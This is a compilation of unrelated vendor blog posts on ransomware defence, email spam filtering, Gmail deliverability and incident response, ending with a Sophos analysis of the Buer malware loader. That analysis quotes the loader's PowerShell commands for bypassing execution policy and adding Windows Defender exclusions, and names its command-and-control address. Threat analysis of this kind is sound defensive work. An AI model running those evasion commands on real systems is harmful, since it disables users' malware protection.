5 critical steps to take – Sophos News

The outbreak of COVID-19 has put cyberattacks on healthcare providers into hyperdrive. Factors contributing to such attacks include, but aren’t limited to:

  • Decentralized business operations
  • Emergency COVID-19 facilities set up without planned security of IT infrastructure
  • A significant rise in the amount of patient health data stored by healthcare organizations
  • Telehealth, and remote workers flung around the world almost overnight, opening up security gaps

Ryuk ransomware, in particular, has seen a resurgence recently. Sophos recently identified a new spam campaign linked to the Ryuk actors, and our Managed Threat Response team assisted an organization in mitigating a Ryuk attack, providing insight into how the Ryuk actors’ tools, techniques, and practices have evolved.

The investigation showed an evolution of the tools used to compromise targeted networks and deploy the ransomware. But what was more notable was how quickly the attacks can move from initial compromise to ransomware deployment. Within three and a half hours of a target opening a phishing email attachment, attackers were already conducting network reconnaissance. Within a day, they had gained access to a domain controller and were in the early stages of an attempt to deploy ransomware.

The evasion techniques of ransomware are rapidly changing. In recent years, ransomware attacks have trended away from brute-force, large-scale attacks to focused, planned, and manually executed attacks that are much harder to detect and block. Humans are handcrafting artisanal malware.

The criminals have hybridized their attacks, combining automation to find victims with gaps in their defenses. Exposed servers with Remote Desktop Protocol (RDP) enabled, administrators without multi-factor authentication for remote access, unpatched web servers, or even these same issues at a trusted partner or service provider are enough to put your network, systems, and resources under ransom.

Here are the five things healthcare providers can do to protect against ransomware attacks:

  1. Maintain IT hygiene. Make sure you’re practicing basic IT hygiene, which includes installing all the latest patches, shutting down RDP entirely (or putting it behind a VPN), and making regular back-ups and keeping them offsite where attackers can’t find them. It also includes applying multifactor authentication to services hosting the most sensitive data in your organization. These are just some of the fundamental steps you can take to protect yourself and your network today.
  2. Educate your users. Teach them about the importance of strong passwords and roll out two-factor authentication wherever you can. Educate them on phishing, which is one of the main delivery mechanisms for ransomware.
  3. Minimize the risk of lateral movement within your network. Segment LANs into smaller, isolated zones or VLANs that are secured and connected by the firewall. Be sure to apply suitable IPS policies to rules governing the traffic traversing these LAN segments in order to prevent exploits, worms, and bots from spreading between LAN segments. And if an infection hits, automatically isolate infected systems until they can be cleaned up.
  4. Use endpoint detection and response (EDR) tools with your endpoint protection. Targeted ransomware today isn’t just about stopping one piece of malware; it’s about stopping an active adversary and disrupting the attack chain that puts them in a position to run the malware. Ensure every endpoint is protected and up to date. A device not functioning correctly may not be protected and could be vulnerable to a ransomware attack. Use tools like EDR, which allow you to ask detailed questions so that you can hunt for active adversaries and identify advanced threats in your network. Once you do, EDR also helps you take appropriate actions quickly to stop such threats.
  5. Close the gap with human intervention. Computers, automation, and tools are amazing but human intellect, pattern recognition, and our ability to apply context provide an even more formidable defense. Managed detection and response (MDR) services are critical here. Pairing your internal IT and security teams with an external team of elite threat hunters and response experts helps provide actionable advice for addressing the root causes of recurring incidents.

Sophos Intercept X Advanced with EDR

Sophos Intercept X Advanced with EDR includes all the features you need to help protect your organization from ransomware attacks like Ryuk, Sodinokibi, Maze, and Ragnar Locker.

Intercept X includes anti-ransomware technology that detects malicious encryption processes and shuts them down before they can spread across your network. Anti-exploit technology stops the delivery and installation of ransomware, deep learning blocks ransomware before it can run, and CryptoGuard prevents the malicious encryption of files, rolling them back to their safe states.

Furthermore, Sophos EDR helps keep your threat hunting and IT operations hygiene running smoothly across your entire estate. Sophos EDR empowers your team to ask detailed questions to identify advanced threats, active adversaries, and potential IT vulnerabilities, and then quickly take appropriate action to stop them. It enables you to detect adversaries lurking in your network and waiting to deploy ransomware that may have gone unnoticed.

Sophos Managed Threat Response (MTR)

The Sophos MTR service adds human expertise to your layered security strategy. An elite team of threat hunters proactively looks for and validates potential threats on your behalf. If authorized, they take action to disrupt, contain, and neutralize threats, and provide actionable advice to address the root causes of recurring incidents.

Sophos Rapid Response

If your organization is under attack and needs immediate incident response assistance, Sophos can help.

Delivered by an expert team of incident responders, Sophos Rapid Response provides lightning-fast assistance with identification and neutralization of active threats against organizations. On-boarding starts within hours, and most customers are triaged within 48 hours. The service is available for both existing Sophos customers as well as non-Sophos customers.

The Sophos Rapid Response team of remote incident responders quickly takes action to triage, contain, and neutralize active threats. Adversaries are ejected from your estate to prevent further damage to your assets.

Net Universe offers all Sophos devices and subscriptions, as well as consultant services, with worldwide delivery.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Set your status as away in Google Chat in Gmail

Quick launch summary

You can now set yourself as “away” in Chat in Gmail.

When you set your status to away, you will show as offline to others, even when you’re active, helping you to focus solely on your work uninterrupted.

New presence menu in Gmail
Set your status as away on Gmail mobile apps

For domains that still use chat in classic Hangouts, disabling the “Show when you were last active” setting will now show you as away in Chat.

This feature is rolling out to Gmail on the web and the Gmail iOS app. It will be coming soon to the Gmail app on Android. We will post on the Google Workspace Updates blog when this rollout begins.

Availability

  • Available to Business Starter, Business Standard, Business Plus, Enterprise Essentials, Enterprise Standard, Enterprise Plus, Education, Enterprise for Education, and Nonprofits customers
  • Not available to Essentials customers


Think Twice: Know how Zoho Mail protects you from spam

In the last two parts of the Think Twice series we discussed email spam, those uninvited guests who wreak havoc at your email party, as well as types of email spam and tips to prevent it. Now that you know all about the trouble spam brings, you might be curious to know what reputable email service providers (ESPs) are doing to help protect users from spam of all types. 

One of the challenges ESPs face is correctly identifying whether an email is spam or legitimate. Zoho Mail does this by studying community data—how and which users mark an email as spam or not spam. With the help of community data and pre-defined conditions, our servers can automatically identify half a million spam emails per hour on average with an admirable success rate. The use of community data in spam processing extends further.

Zoho mail spam protection

Say a user is sending an email from a third-party email server to a Zoho Mail user. For that email to get delivered to the recipient’s inbox, the sender’s IP should hold a positive reputation. The reputation score of an IP is dependent on the number of spam and non-spam emails generated from that IP. When a source with low reputation places an email transfer request to the Zoho Mail server, we will either reject the email or deliver it to the recipient mailbox’s spam folder, depending on the user settings.

Keep spam at bay:

If the nuances of classifying the right emails as spam are a challenge, determining the right approach for bulk emails is a bigger one. Though our filters can recognize and sift out emails with spam fingerprints—attachments masked with malware, phishing links, malicious executable macros, non-RFC-compliant emails, unsolicited bulk emails, and more—the approach we need to take for each of them differs. While we filter out phishing emails more vigorously, reducing the false positives, we take a more user-specific approach to bulk emails, given that a bulk email can be spam to one user and of interest to another.

With the help of user-centric and organization-wide spam control settings, administrators can customize and choose what kind of emails they want Zoho Mail to deliver to their inbox. Starting from choosing which parts of an email you want us to analyze using our filters, administrators can choose to show sender-based alerts, process spam based on specific languages, and quarantine or reject emails based on authentication framework (SPF, DKIM, DMARC, and DNSBL) verification. The administrator can also add specific emails, domains, and IP addresses to their Allowed list or Blocked list to receive, or not receive, emails from certain senders. Apart from the organization-wide list maintained by the administrator, each user can customize their own anti-spam lists to block or allow senders of their choice.

Combat phishing with added accuracy:

In our previous post, we discussed the technique spammers use to phish for personal data: copying the user interface and experience of a legitimate organization, including the domain address. For example, say you maintain your finances at a bank named Woods, and “woods.com” is their domain address. Now a spammer might phish using a domain—”vvoods.com” or “w00ds.com”—that looks like the legitimate address by changing a few letters to deceive recipients.

While our spam filters are capable of spotting such emails, you can also take additional spoof control measures for the domains that are significant to your organization by verifying all cousin domains of that respective domain. And it doesn’t stop there. You can protect your organization members from spoofed emails and prevent this fraud from happening with the help of Zoho Mail’s Display Name Spoofing feature.
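A defender-side check for the cousin domains described above, added here as a Python example that is not Zoho Mail's code: it folds common letter substitutions (vv for w, 0 for o, 1 for l) into a canonical skeleton and also catches one-letter additions or omissions, then classifies each sender as legitimate, cousin, or unrelated. The woods.com domain is the article's hypothetical; the From headers are constructed samples, and the second-level-domain split assumes a one-label public suffix.

```python
"""Flag sender domains that are confusable 'cousins' of a protected domain."""
from __future__ import annotations
import re

# Multi-character confusables are folded first, so that "vv" becomes "w"
# before the single-character map runs.
SEQUENCE_CONFUSABLES = (("vv", "w"), ("rn", "m"))
# Single-character lookalikes collapsed onto one canonical letter.
CHAR_CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "i": "l", "3": "e", "5": "s", "8": "b", "2": "z",
})


def skeleton(label: str) -> str:
    """Canonical form of a DNS label: lowercase with confusables folded."""
    s = label.lower()
    for seq, canon in SEQUENCE_CONFUSABLES:
        s = s.replace(seq, canon)
    return s.translate(CHAR_CONFUSABLES)


def sender_domain(from_header: str) -> str:
    """Extract the domain from a From: value such as 'Woods <alerts@woods.com>'."""
    m = re.search(r"@([A-Za-z0-9.-]+)", from_header)
    if not m:
        raise ValueError(f"no address in From header: {from_header!r}")
    return m.group(1).lower().rstrip(".")


def split_domain(domain: str) -> tuple[str, str]:
    """Return (second-level label, suffix). Assumes a one-label public suffix
    such as .com; a public-suffix list is needed for co.uk-style domains."""
    labels = domain.split(".")
    if len(labels) < 2:
        return domain, ""
    return labels[-2], labels[-1]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-letter additions or omissions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_cousin(candidate: str, protected: str) -> bool:
    """True when candidate is not the protected domain but is confusable with it."""
    candidate, protected = candidate.lower(), protected.lower()
    if candidate == protected:
        return False
    c_sld, c_tld = split_domain(candidate)
    p_sld, p_tld = split_domain(protected)
    if skeleton(c_sld) == skeleton(p_sld):
        return True  # e.g. vvoods.com, w00ds.com, woods.co
    # Same suffix, one letter added, dropped or swapped: woodss.com, wods.com
    return c_tld == p_tld and edit_distance(c_sld, p_sld) == 1


def classify_sender(from_header: str, protected_domains: list[str]) -> str:
    """'legitimate' for the protected domain or its subdomains, 'cousin' for a
    lookalike, 'unrelated' otherwise."""
    domain = sender_domain(from_header)
    for p in (d.lower() for d in protected_domains):
        if domain == p or domain.endswith("." + p):
            return "legitimate"
    if any(is_cousin(domain, p) for p in protected_domains):
        return "cousin"
    return "unrelated"


# Constructed sample From: headers, following the article's woods.com example.
SAMPLE_FROM_HEADERS = [
    "Woods Bank <alerts@woods.com>",
    "Woods Bank <alerts@vvoods.com>",
    "Woods Security <security@w00ds.com>",
    "Woods <noreply@woodss.com>",
    "Newsletter <news@example.org>",
]

if __name__ == "__main__":
    for hdr in SAMPLE_FROM_HEADERS:
        print(f"{classify_sender(hdr, ['woods.com']):>10}  {hdr}")
```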

Spam processing is not without its flaws: as ESPs improve their filtering mechanisms and block spam emails with higher accuracy, spammers also become more advanced in their masking techniques, for example by using reputable services. Some spammers have started following RFC rules and the SPF and DKIM authentication protocols, among others, to escape spam processing. This new, evolved spam can sometimes slip through the filters and end up in the recipient’s inbox.

This is why we’re constantly updating the Zoho Mail server to learn new fingerprints even with a small sample size. And don’t worry: even if one or two spam emails escape our wall of filters, our post-delivery spam check can identify and mark those emails as spam automatically.

Given all the challenges in identifying and processing spam, we at Zoho Mail place our users’ safety and security before every other priority. We have already added a ton of new spam control features to our all-new admin console. As we move forward, we’ll continue refining our techniques even further to improve your experience.

We hope the Think Twice blog series has helped you learn more about email spam and ways to prevent it! Give Zoho Mail’s anti-spam features a try and let us know what you think.


Yamine Durai, a part of Zoho Mail’s marketing team, is a tech enthusiast.
But if you spot her away from office hours, you will probably find her reading a history book while honing her oratory skills.


How an effective onboarding system benefits your organization

Onboarding is one of the first opportunities you have to communicate your company culture to new employees. Having a straightforward onboarding system speaks volumes about your organization and gives new hires a sense of direction. If the process is riddled with inefficiencies, employees will be more likely to leave your organization, and the money spent on recruiting and training these individuals goes to waste. This is why onboarding should be automated: it provides a clear, simple experience to your employees.

Automating onboarding

Here are some of the benefits of automating onboarding:

  • Streamlines mundane administrative tasks and reduces errors
  • Supports candidate onboarding, which helps motivate candidates even before they join your organization
  • Digitizes the paperwork associated with onboarding, consolidating it all in a single application
  • Ensures compliance by documenting all the onboarding paperwork in a centralized system
  • Provides employees all the information they need about your organization
  • Generates reports, which makes it easy for you to track the progress of your new hires

Read more about how onboarding benefits your organization in our HR Knowledge Hive.


Ensuring better inbox placement for Gmail recipients

Expert Diaries from Zoho Campaigns connects avid email marketers to the experts in this space to help them learn some best practices and tips. Our aim is to connect email geeks and form a community that learns email marketing from one another.

We recently sat down with Sridhar Chandran, an anti-spam and email-deliverability expert with over 13 years of experience who currently works as Solution Architect at Validity, Inc. There, he helps high-volume senders optimize their email marketing for better email deliverability (inbox placement).

In our 40-minute chat, we discussed with Sridhar the specifics of email deliverability for Gmail and asked him many sought-after questions.

For those of you who prefer reading, here’s the rundown of the conversation.

Key terms

ISP – Inbox Service Providers, aka mailbox providers (for example, Gmail)

ESP – Email Service Providers (for example, Zoho Campaigns)

SPF – Sender Policy Framework

DKIM – DomainKeys Identified Mail

DMARC – Domain-based Message Authentication, Reporting, and Conformance

IPv6 – Internet Protocol Version 6

Google Postmaster – A tool by Gmail which helps you analyze your email performance

Sunset Policy – A plan or action for managing inactive contacts after a certain point of time

BIMI – Brand Indicators for Message Identification

VMC certificate – Verified Mark Certificates (A digital certificate authenticating the logo of a sender’s domain)

We know that filtering systems differ from one ISP to another, but how different is Gmail’s as opposed to the likes of Yahoo, Outlook, and more? More often than not, 40% of a mailing list comprises Gmail recipients. In Asia, the number only goes up. So it’d be great if you could explain the specifics of Gmail’s spam filters.

To understand this, we have to trace how Gmail has evolved over the years. If you guys remember, Gmail offered 1TB storage while starting off in 2004. This was their USP. At that time, ISPs like AOL, Yahoo, and Hotmail offered limited storage. From a mail-filtering perspective, Gmail relied on IP reputation a lot. (90% of the emails the ISPs receive per day are spam. So a lot of emails had to be blocked.)

They went one step ahead and created a separate folder called spam, while giving the users the option to move emails between spam and inbox. If a user moved an email from spam to inbox ascertaining it’s genuine, the spam filters took cues and expanded the data points used for decision-making. This was a major differentiator.

Then came IPv6, authentication methods (like DKIM), and more signals. After a point, they started relying more on the sending domain’s reputation than the IP reputation. (Both were used.) A domain’s reputation was decided based on different engagement signals: opens, clicks, getting added to the address book, emails moved from spam to inbox, and more. The other ISPs also emphasize engagement signals, but Gmail implemented this much earlier. Gmail also had the advantage of basing filtering decisions around Google’s data points.

For example: If you’re a brand-new sender, other ISPs have to gauge you based on the volume of emails you send. This is because they’re seeing you for the first time. When it comes to Gmail, they can use certain data points from Google: your website’s ranking, its shelf life, and more.

Gmail doesn’t have a traditional feedback loop like Yahoo or Hotmail—so how does a sender troubleshoot their (deliverability) issues with Gmail?

Yes, you’re right. Gmail doesn’t have a traditional feedback loop like other mailbox providers. But there are some signals you can take a look at. Again, this might not be unique to Gmail. (Some other mailbox providers might also have them.) The first one is bounces—hard bounces and soft bounces. This is something I feel that most users are not utilizing.

When most of your emails have traces of spam, the defence mechanism for most mailbox providers is rejecting the emails, right? So as a sender, you have to take a look at the delivery rates. The second one is unsubscribes. The other major thing at Google is Postmaster Tools. I highly recommend that everyone utilizes it. The best part is this: The domain owner can directly register for it by visiting the site. (You don’t have to depend on your ESP for the configuration.)

In summary, you have to keep a close eye on your engagement metrics. For example: When you get only 10% opens from a delivery rate of 98%, there’s definitely some issue. You can also monitor your deliverability using certain third-party tools: Return Path, 250ok, and more.

What are the various data points a sender should look at in Google Postmaster (to narrow down email-deliverability-based problems)? What are the thresholds one should check?

Gmail provides the traditional engagement metrics. If you’re looking at spam complaints, they’re available in Google Postmaster. You can also check your domain and IP reputation there. (Which is a valuable data point.) There are also authentication results, which are important to know the stability of mechanisms like SPF, DKIM, and DMARC.

To answer the second question, there are no set or predefined thresholds. However, there are some industry standards for spam complaint rates. Less than 0.2% is a good place to be in. Having your bounce rates below 0.4% is a good benchmark. That said, your reputation is divided into four bands in Google Postmaster: high, medium, low, and bad.

If your reputation is high, you’ll have higher thresholds. If it’s poor, you don’t even want to hit 0.1% complaints. Threshold levels are dynamic. (It varies based on the reputation band.) So know which band you’re in and play around with the numbers.

Gmail has several tabs—social, updates, primary, and, particularly, promotions. So I wanted to ask this: Is the promotions tab really bad? Even if it’s not bad, what determines the placement of an email there?

This is one of the commonly asked questions. It’s a little frustrating too. We have to understand that the promotions tab is in the inbox; it’s not a spam folder. That said, I can understand the mindset of the senders: primary tab placement means better engagement rates.

Over time, filters have evolved to place the marketing emails in promotions. As a sender, we have to understand this: If a user enables tabs for their mailbox, it means they don’t want to see marketing emails in their primary tab. Earlier, I used to manually create several folders based on from addresses and more. The data fed to the filters is so much that they’re able to decide the placement of marketing emails. They’re making lives easier for the users. So we should try to leverage the promotions tab instead of fighting it. Remember, the users have the option to move your emails to the primary tab as well.

Coming to your next question, Gmail has a Natural Language Processing engine, specifically looking at the content of your email. Of course, they have machine learning capabilities to classify content based on data signals. (We don’t have to worry about this.) A study by 250ok found that one in four users didn’t configure tabs in their mailbox at all. Apple Mail and Outlook don’t have a tabbed structure for inboxes, right? I’d always look at leveraging the promotions tab.

Why not try Gmail’s email annotations if your email contains offers and deals? Use JSON script. It helps in bringing your emails to the top of the promotions tab in a very action-provoking manner.

I have a follow-up question, Sridhar. I’m seeing a lot of people discussing the usage of URLs in emails. They feel that using three or more URLs leads to the placement in the promotions tab. How far is it true?

First, I’d like to bust the myth here: it’s not true. Of course, there are no magic numbers in terms of the quantity of URLs. I’d prioritize the quality of the URLs over quantity. When I say quality, I mean the destination of the URLs. You have to check whether it’s pointing to the website(s) you’re managing; you don’t want to use third-party URLs. I’ll not worry about the number of URLs. In Gmail, we know for a fact that the email gets clipped when its size exceeds a certain limit. This is something I’d look at rather than the number of URLs. You should also answer a couple of questions before sending an email: Is the HTML correct? Are the URLs specified out? You can also include a text version along with the HTML version (images) as most of the clients disable images by default.

Most emails received per day go to the spam folder. Gmail has a specifically different way of spam foldering. Usually they don’t mark many emails as spam. How should the email marketers see to it that they are not marked as spammers?

Also, can you please tell us how can the email marketer understand which subscriber is inactive and which subscriber is not?

There are no particular magic numbers for this so I will speak anecdotally.

Firstly, the destination of your email, or where it’s going to land, is decided even before you hit the send button. Factors like single opt-in, double opt-in, purchased lists, and so on are taken into account. The quality of your list is the first important thing you have to keep in mind. There are a lot of ways by which you can go ahead and validate your list to ensure that typos and all those kinds of things can be taken care of.

Secondly, it’s about your audience, their engagement factor, active users and so on.

Industry best practice or threshold we have seen is somewhere around 90 days. It is supposed to be a good number within an active audience.

Create segments for 30 days, 60 days, 90 days active users and call them reputation superheroes. If you are getting a lot of spam complaints, suppress the older addresses and send mails to the 30 days active audiences to uplift your reputation. Gmail specifically takes a look at the engagement factor to ensure that you are sending emails to only those audiences who are consistently interactive.

Among segments, there will always be one such segment that contains the data of audiences with whom you have not interacted for a considerable period. Times like these call for you to look into your sunset policy and undertake re-engagement campaigns. Ask your audiences if they organically want to be a part of your lists or opt out. Repeat this periodically rather than once in two years when your emails are marked as spam.

Again, there are many ways to let your emails engage with your audience. Create journeys as simple as welcome journeys. This is underutilized by many senders and so they stay bereft of their benefits.

Also try to engage audiences with cart abandonment journeys. Keep a close tab on the engagement pattern and make amends in the creatives to fetch more engagement with the most appropriate content.

With automation, we are achieving time- and response-based user engagement. What are your views on automation?

I will speak about this from a deliverability perspective. Gmail does look at the engagement and how frequently your users have engaged with your emails. Employing these journeys lets the filters know that you are sending to engaged audiences for improved reputation. It also allows the benefit of having a great reputation.

As I said, Gmail annotations are useful, but they alone cannot ensure a better position in the Promotions tab. To utilize this, you have to be at the top of your reputation game. Email journeys are a big help in achieving that.

What should be in the checklist of an email marketer with a great sending reputation while moving over from one email marketing platform to another? Which best practices will ensure a smooth transition?

If you already have an established reputation at a particular ESP and are moving to another one, you have to warm up (Domain and IP). This is because you are shifting to a new infrastructure.

You might traditionally send from one IP and one domain combination and then suddenly move on to another one. Gmail will consider that as a new signal so you have to warm up. Initially start sending out emails in slow volume instead of putting your foot on the accelerator.

Before starting, make sure that your infrastructure has everything in place. Complete all the authentication processes (SPF, DKIM, DMARC) and let Gmail consider your emails as authenticated traffic. Upon completion of the previous process, send emails to your most-engaged audiences. Take 10 percent from among the 30 days active users and shift them so that you can retain brand affinity even when emails are sent out from a different infrastructure.

Apart from this, there’s another thing that you need to monitor—the Google postmaster tools. Once you have done the transition from one ESP to another, looking at the signals in Google Postmaster tools will help. You can check whether your authentication is alright, if the domain reputation is dropping, and so on. Keep in mind that the data we see in Google postmaster tools is not real-time—there can be a delay of 48-72 hours. Pace out campaigns in such a way that you give enough time to those monitoring tools to update the data.

Apart from this, I would say that a traditional switchover can at least take two to four weeks. It again depends on the volume of subscribers you have. Check the time frame you need to give for a switchover from one ESP to another and also allow proper warm up to happen.

Now DMARC and BIMI are hot topics. How important are they for my inbox placement?

DMARC actually has three policies:

  • p=none
  • p=quarantine
  • p=reject

p=quarantine and p=reject are the only enforcement policies, whereas p=none is actually a monitoring mode. The latter does not actually help the inbox providers as they are not making any decisions based on that DMARC policy. As an email marketer, you can begin with p=none. You wouldn’t lose anything with this, only that you have to go ahead and evaluate all your email traffic based on this DMARC policy.

The enforcement mode gives senders an advantage in taking care of any spoofing and brand-related theft. You actually inform mailbox providers if the authentication is not in place so they can go ahead and spam-folder or reject your emails. Just having authentication or DMARC in place is not going to ensure inbox placement. All the other signals we have been speaking about for the previous hour are applicable.

BIMI right now is being utilized only at Yahoo. In Gmail you need to have an additional VMC certificate to utilize BIMI as there it is still in the beta stage. In Yahoo you don’t need that to utilize BIMI. I would say as a sender you need to first concentrate on getting into a DMARC enforcement policy as BIMI can still wait.

We see that some emails, when opened, have the option to either mark them as spam or hit unsubscribe. How does Gmail decide to show this, and why doesn’t it show for all the senders?

The primary reason behind this is the domain reputation, and thus Gmail doesn’t decide to show this for all the senders. A mailbox provider wants to provide less information to a bad sender and as much information available to a good sender.

The second thing is including a list unsubscribe header, which is currently being prescribed by a lot of mailbox providers. Mail clients such as Apple Mail and Gmail clients pick the unsubscribe from list unsubscribe header and surface it to the subscriber or the user.

Elaborating a bit on list unsubscribe—the ‘unsubscribe’ option in particular—it’s good to have the ‘unsubscribe’ in the footers, which is a requisite in some markets, but it’s also good to have it in the headers. The absence of that option might force your users to mark your mail as spam. It’s rather good to have it in both places.

When I open the emails I see the ‘alert’ banners. We see banners like ’emails from this particular domain are marked as spam’ and ‘this mail is dangerous’ or ‘this link is dangerous’. How can a sender resolve this issue quickly and what is the use of it?

A lot of this is dependent on domain reputation. Rightly as those banners say, there are a lot of different rules that decide why a mail is placed in the spam folder apart from domain reputation being poor.

The other thing that makes your email look dangerous is a phishing signal. You might have a URL or something in the email that has phishing characteristics. In that case you might want to look at the content of your email, check all the URLs, and remove any URLs that are not hosted by you. I have seen people who break down the content of the email and send in different parts to troubleshoot where exactly the problem lies. There’s some effort involved if it’s a phishing-related issue.

The bigger picture is, ‘hey, my mails are going to spam folder, how do I get it back to inbox?’ So, reiterating what was mentioned previously, you need to have a good mailing list in place, looking at your audience, sending to an engaged audience, looking at your content, making sure that it’s structured in such a way that ensures your audiences are engaged and are going ahead and clicking the CTAs.

If you are already getting a lot of spam complaints, then add an additional ‘unsubscribe’ at the top of your email instead of at the bottom. It will give your users an easy opt-out rather than marking the email as spam. If you are getting spam foldered, I would suggest you do not look like a spammer: follow the best practices, and ensure you’re sending emails to people who really want your email.

How long would it take to fix my domain reputation if I am following all the best practices?

It depends on the band of reputation in Google Postmaster tools. If you are somewhere amidst a very poor reputation, it would take around 4-6 weeks while following all the best practices. It takes time as it depends on the number of positive signals given by you to Gmail for returning to the inbox. Look at a long timeframe—if you are doing everything right, you will see the benefit.

Net Universe offers all Zoho subscriptions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Under attack? Sophos Rapid Response is here to help  – Sophos News

Experiencing an active cyberattack and defending against a potential breach can be an incredibly stressful time for an organization. However, many internal IT security teams lack the experience necessary to successfully respond to potential breaches, and getting immediate help from an outside resource can be next to impossible… until today.   

We’re thrilled to announce the availability of Sophos Rapid Response, a new service which provides lightning-fast assistance with active threats, delivered by an expert team of incident responders.

The service, which has already helped dozens of organizations while in pilot mode, is available to both existing Sophos customers as well as non-Sophos customers.

Seconds matter

When under attack, time is of the essence. That’s why the Rapid Response service is built to be fast. How fast? Onboarding starts within hours, and most customers are triaged in 48 hours.

“I’ve seen firsthand how the Sophos Rapid Response team is able to cut through all of the noise to quickly remediate security incidents within hours, and the feedback from customers has been nothing but exceptional,” said Jeremy Weiss, cybersecurity practice lead at CDW.

The Rapid Response team are experts at quickly stopping advanced attacks, minimizing damage and costs, and reducing recovery time. Regardless of whether it’s a ransomware infection, network compromise, or unauthorized access attempting to circumvent security controls, they’ve seen it all and stopped it all.

A new type of incident response service

Rapid Response is an industry first, offering a fixed-fee remote incident response service that responds to active cybersecurity attacks throughout its entire 45-day term of engagement.

There are no hidden fees or escalating costs, and customers are protected for the full 45-day subscription term. Should the threat return or a related threat emerge, Rapid Response will respond at no additional cost.

Unlike traditional incident response (IR) services, which are priced hourly, you and the Rapid Response team have the same goal: to get your organization out of the danger as quickly as possible. And since the service is delivered remotely, response actions can be initiated on day one.

“A charitable organization providing housing and support services to thousands of vulnerable adults was hit by ransomware, taking down operations at all of its more than 40 facilities. The organization called us for help, and we immediately deployed Sophos Rapid Response. Working together with Sophos Rapid Response, we were able to get them back up and running quickly so they could continue serving those in need,” said Steve Weeks, president at Netcetera.

More information about Rapid Response can be found on our website.

Interested in ongoing managed detection and response? Sophos Managed Threat Response (MTR) provides ongoing 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.


inside the Buer Loader malware-as-a-service – Sophos News

During our investigation of a Ryuk attack in September 2020, we found the Ryuk actors had used a relatively new method for gaining initial access: a malware dropper called Buer. The September attack was part of a low-volume spear phishing attack tracked by Sophos. Over the next month, it evolved into a much larger spam campaign, carrying Buer as well as a number of other types of “loader” malware, as the Ryuk operators sought to ramp up their attacks.

First introduced in August of 2019, Buer is a malware-as-a-service offering that is used to deliver whatever package the service customer desires, providing initial compromise of targets’ Windows PCs and allowing them to establish a digital beachhead for further malicious activity. Buer has previously been tied to banking trojan attacks and other malware deployments—and now, apparently, has been embraced by ransomware operators. In many ways, Buer is positioned as an alternative to Emotet and Trickbot’s emerging Bazar loader (which both use similar behaviors to deploy).

Full-service bots

Buer was first advertised in a forum post on August 20, 2019 under the title “Modular Buer Loader”, described by its developers as “a new modular bot…written in pure C” with command and control (C&C) server code written in .NET Core MVC (which can be run on Linux servers). For $350 (plus whatever fee a third-party guarantor takes), a cybercriminal can buy a custom loader and access to the C&C panel from a single IP address—with a $25 charge to change that address. Buer’s developers limit users to two addresses per account.

The bot code, compiled for each user specific to a download, has an advertised size between 22 and 26 kilobytes—though the sample we looked at was about 40 kilobytes after being unpacked from its dropper. The bot can be configured for execution either as a 32-bit Windows executable or as a DLL.

The C&C can be used to track the number of successful downloads in a campaign, and to assign tasks to bots by filters such as the country they’re in, the “bitness of the operating system” (32 or 64 bit), the number of processors on the infected machine and the level of permissions obtained by the bot. Bots detected to be operating within the Commonwealth of Independent States will be shut down—which is a common behavior of malware developed in the ex-USSR region, as an attempt to avoid attention from local authorities.

Figure: The file manager in the command and control panel for the Buer loader bot. Files can be uploaded for distribution here—the maximum size is 28 megabytes. The Buer panel tracks installations by operating system, CPU, “bitness” (32 or 64), activity, and which geographic region they’re in based on localization settings and other fingerprinting.

Tasks can be scheduled to run for a specific amount of time, or suspended upon command, with telemetry for the task sent back to the panel. The panel can also be used to deploy updates to bots, including (at least based on the advertisement) deployment of modules, with prebuilt modules to be added “over time” as part of the service. And of course, setup consulting and technical support are provided.

Prize inside every doc

Figure: Buer loader attack flow.

Sophos’ Rapid Response team discovered a sample of Buer at the root cause of a September Ryuk attack. The loader was delivered by a malicious document stored on Google Docs, which required the victim to enable scripted content to activate—a behavior similar to Emotet and other loader attacks via malicious spam emails but leveraging cloud storage to make forensic analysis more difficult.

We collected other messages from the same campaign in Sophos’ spam traps during the same period. The messages all used Google Docs files, and were sent using a popular commercial email distribution service—further obscuring the source and the link associated with the malicious document.

Figure: An example of the initial run of Buer bot distributing spear phishes.

The payload of that malicious document was named print_document.exe. Like other Buer dropper samples we’ve analyzed, it was a digitally signed binary, using a stolen and now-revoked certificate that DigiCert had issued on September 17, 2020 to “NEEDCODE SP Z O O,” a Polish software developer. The dropper was built using modified code from a Microsoft sample application for image capture, AcquireTest, using the code’s function for “file enumeration” to delete and drop code.

The dropper does a number of things to ensure proper delivery. It first checks for the presence of a debugger to evade forensic analysis, and then checks language and localization settings to determine the geographic region of the system being attacked. If the settings match a CIS country, it will exit without depositing the malware. Otherwise, the dropper then dumps the Buer bot in memory and executes it.

Intriguingly, the Buer Loader and Ryuk ransomware use the same shellcode loader to execute the unpacked malware code in memory.

This may not be an indication of shared authorship; the developers may have simply used the same sample code as their source.

Upon launch, the Buer bot does a number of things to set up shop. The bot executes two sets of PowerShell commands—one to bypass execution policies to allow PowerShell commands executed by the bot to go through without warnings (Set-ExecutionPolicy Bypass), and another (add-mppreference -exclusionpath) to make changes to Windows Defender’s exclusion list—concealing files it downloads from Windows’ built-in malware protection.

Buer queries the Windows Registry for the value of Microsoft\Cryptography\MachineGuid to get the unique identifier for the infected machine. The bot then calls home, interacting with the command and control server (in this case, 104[.]248.83.13) through a series of secure HTTP “POST” and “GET” messages.

Then there’s the “loader” part of what Buer does. The files packaged to be dropped by Buer are retrieved from a designated source and dropped in a folder created in the C:\ProgramData directory—the directory name is created programmatically and varies with deployments. In the September attack, Buer was used to deploy a Cobalt Strike beacon to the infected computer, which was then in turn used to exploit the network and launch a Ryuk attack.

Mixing it up

The malicious spam campaign that resulted in the Buer loader and Ryuk ransomware infections evolved at the end of September, as we observed the actors behind it shift the same tactics away from low volume on SendGrid to mail sent through Internet hosting providers—predominantly through a single Russian ISP. Then in October, the volume of spam rose dramatically—shifting away from Google Docs (as Google shut down the old files for terms of service violations) to another commercial email and file delivery service.

Figure: A somewhat less targeted spam message with a link to a malicious document stored by Constant Contact.

